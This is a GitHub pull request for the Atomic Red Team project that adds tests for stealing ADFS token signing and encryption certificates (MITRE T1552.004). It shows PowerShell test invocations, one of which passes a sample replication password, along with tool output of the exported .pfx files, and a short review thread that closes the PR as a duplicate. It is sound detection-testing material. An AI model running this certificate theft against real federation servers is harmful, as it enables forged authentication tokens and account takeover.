### PR TITLE
T1552.004: ADFS Certificates theft 

### PR DESCRIPTION
**Pull request by piaconsigny**
**Details:**
Retrieve ADFS token signing and encrypting certificates. Works locally on ADFS and from a domain joined computer.

**Testing:**
Works fine in test environment.

Remote : 
```
PS C:\Users\Administrator.PIABANANA> Invoke-AtomicTest T1552.004 -TestNumbers 6 -InputArgs @{ "adfs_service_account_name" = "adfs_svc"; "replication_user" = "replication"; "replication_password" = "SunShine77;"; "adfs_server_name" = "adfs.piabanana.com" }
PathToAtomicsFolder = C:\AtomicRedTeam\atomics

Executing test: T1552.004-6 ADFS token signing and encryption certificates theft - Remote
Done executing test: T1552.004-6 ADFS token signing and encryption certificates theft - Remote
    ___    ___    ____  ____      __                        __
   /   |  /   |  / __ \/  _/___  / /____  _________  ____ _/ /____
  / /| | / /| | / / / // // __ \/ __/ _ \/ ___/ __ \/ __ `/ / ___/
 / ___ |/ ___ |/ /_/ _/ // / / / /_/  __/ /  / / / / /_/ / (__  )
/_/  |_/_/  |_/_____/___/_/ /_/\__/\___/_/  /_/ /_/\__,_/_/____/

 v0.4.8 (Teams Nation edition) by @DrAzureAD (Nestori Syynimaa)
WARNING: Additional signing    certificate is same as the current signing certificate and will not be exported.
WARNING: Additional encryption certificate is same as the current signing certificate and will not be exported.


    Directory: C:\Users\Administrator.PIABANANA\AppData\Local\Temp


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         6/10/2021   6:39 PM           2496 ADFS_encryption.pfx
-a----         6/10/2021   6:39 PM           2496 ADFS_signing.pfx

Certificates retrieved successfully 

```
On ADFS Server : 
```
PS C:\Users\Administrator> Import-Module "C:\AtomicRedTeam\invoke-atomicredteam\Invoke-AtomicRedTeam.psd1" -Force
PS C:\Users\Administrator> Invoke-AtomicTest T1552.004 -TestNumbers 5
PathToAtomicsFolder = C:\AtomicRedTeam\atomics

Executing test: T1552.004-5 ADFS token signing and encryption certificates theft - Local
Done executing test: T1552.004-5 ADFS token signing and encryption certificates theft - Local
    ___    ___    ____  ____      __                        __
   /   |  /   |  / __ \/  _/___  / /____  _________  ____ _/ /____
  / /| | / /| | / / / // // __ \/ __/ _ \/ ___/ __ \/ __ `/ / ___/
 / ___ |/ ___ |/ /_/ _/ // / / / /_/  __/ /  / / / / /_/ / (__  )
/_/  |_/_/  |_/_____/___/_/ /_/\__/\___/_/  /_/ /_/\__,_/_/____/

 v0.4.8 (Teams Nation edition) by @DrAzureAD (Nestori Syynimaa)
WARNING: Additional signing    certificate is same as the current signing certificate and will not be exported.
WARNING: Additional encryption certificate is same as the current signing certificate and will not be exported.


    Directory: C:\Users\Administrator\AppData\Local\Temp\2


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----       10/06/2021     18:58           2496 ADFS_encryption.pfx
-a----       10/06/2021     18:58           2496 ADFS_signing.pfx

Certificates retrieved successfully

```

**Associated Issues:**
None

### CODE REVIEW

**Review by mgraeber-rc — APPROVED** [review]

**Comment by amashinchi-rc** [comment]
@piaconsigny this is approved, feel free to update the branch so it is no longer out of date, and then we can get it merged in!

**Comment by piaconsigny** [comment]
@amashinchi-rc Hello Adam, we ran into a problem with Git. This PR can't be updated, so I create a new one : https://github.com/redcanaryco/atomic-red-team/pull/1605
The code is the same. Really sorry for the inconvenience.

**Comment by piaconsigny** [comment]
You can close this PR if you want, I can't do it  myself.

**Comment by amashinchi-rc** [comment]
Closing as duplicate of #1605 .

**Pull request closed without merging**
